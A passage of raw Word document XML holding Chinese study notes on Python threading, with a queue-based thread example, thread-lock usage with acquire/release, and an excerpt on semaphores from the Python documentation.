        <w:t>多线程要进行消息同步，可以不传参、不声明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>global</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2E35B5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多线程的用法也基本涉及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> .start()  .join()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用法基本同多进程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CF2769" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码示例如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6627CBFF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FC9E236" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from collections import deque</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF7ECAA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t># from multiprocessing import Queue, Process, Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283EEE55" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1149EBAD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from threading import Thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE3198C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3257F790" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def Thread_1():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C111C5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D3B730" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="652799C2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def Thread_2():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4281D7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017BF132" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AE0C7B6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def Process_1():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5A3B9A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    while signal_CLEAN_FREEDISK.qsize()&gt;0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAD67E9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print("P1: ", signal_CLEAN_FREEDISK.get())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03783987" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3643A864" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def Process_2():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9FCE95" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    while signal_CLEAN_FREEDISK.qsize()&gt;0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C50431" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print("P2: ", signal_CLEAN_FREEDISK.get())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163EB261" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E4E0056" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116FDFED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEE442B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EB9DA85" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B01034C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主函数入口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E8526E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # global signal_CLEAN_FREEDISK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAEF4F0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    signal_CLEAN_FREEDISK = queue.Queue()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F7971F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    for i in range(50):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026D4FEA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        signal_CLEAN_FREEDISK.put(i)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369F7AB5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_1 = Thread(target=Process_1, args=())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F333C2A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_2 = Thread(target=Process_1, args=())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B97C98A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_3 = Thread(target=Process_2, args=())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591B6209" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_1.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8CE83C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_2.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB60E07" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_3.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15450048" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_1.join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1328868D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_2.join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BE9223" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_3.join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF9040E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完毕</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051D87E6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58F32AF1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03C335B9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72F0A956" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="549" w:name="_Toc159779982"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>线程锁</w:t>
      </w:r>
      <w:bookmarkEnd w:id="549"/>
    </w:p>
    <w:p w14:paraId="159D2BC0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://z.itpub.net/article/detail/DE03B9C2CC0ECD3366C7ADCDE9550CE6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A4209E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38842C42" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>线程锁是同一时间只放一个线程去操作数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A2B82B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以线程锁你如果放在线程级别更底层的地方没有用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A801B72" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FA9A561" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>锁的创建：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3A4038" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>global lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BE9735" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    lock = threading.Lock()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BBB78D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>锁的使用：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7D7A42" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            for single_a_list in a_list:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C80E3E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                lock.acquire()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D73950" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                schedual_recovery.insert(self.path, single_a_list, 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BE9545" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                lock.release()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C04485" w14:textId="77777777" w:rsidR="004A4711" w:rsidRDefault="004A4711" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="433EF113" w14:textId="3BD48248" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="550" w:name="_Toc159779983"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>信号量</w:t>
      </w:r>
      <w:bookmarkEnd w:id="550"/>
    </w:p>
    <w:p w14:paraId="0844B2B5" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49EC743E" w14:textId="45EE2B40" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1715B28D" w14:textId="5E522764" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF5D95">
        <w:t>https://docs.python.org/zh-cn/3/library/threading.html#semaphore-objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EB936A" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06DBA0E9" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信号量对象¶</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B8BA13" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是计算机科学史上最古老的同步原语之一，早期的荷兰科学家</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Edsger W. Dijkstra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发明了它。（他使用名称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> P() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> V() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而不是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> acquire() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> release() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C743EA" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E85601E" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个信号量管理一个内部计数器，该计数器因</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> acquire() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法的调用而递减，因</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> release() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法的调用而递增。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计数器的值永远不会小于零；当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> acquire() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法发现计数器为零时，将会阻塞，直到其它线程调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> release() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC53F55" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="331B70F4" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信号量对象也支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上下文管理协议</w:t>
      </w:r>
      <w:r>
        <w:rPr>
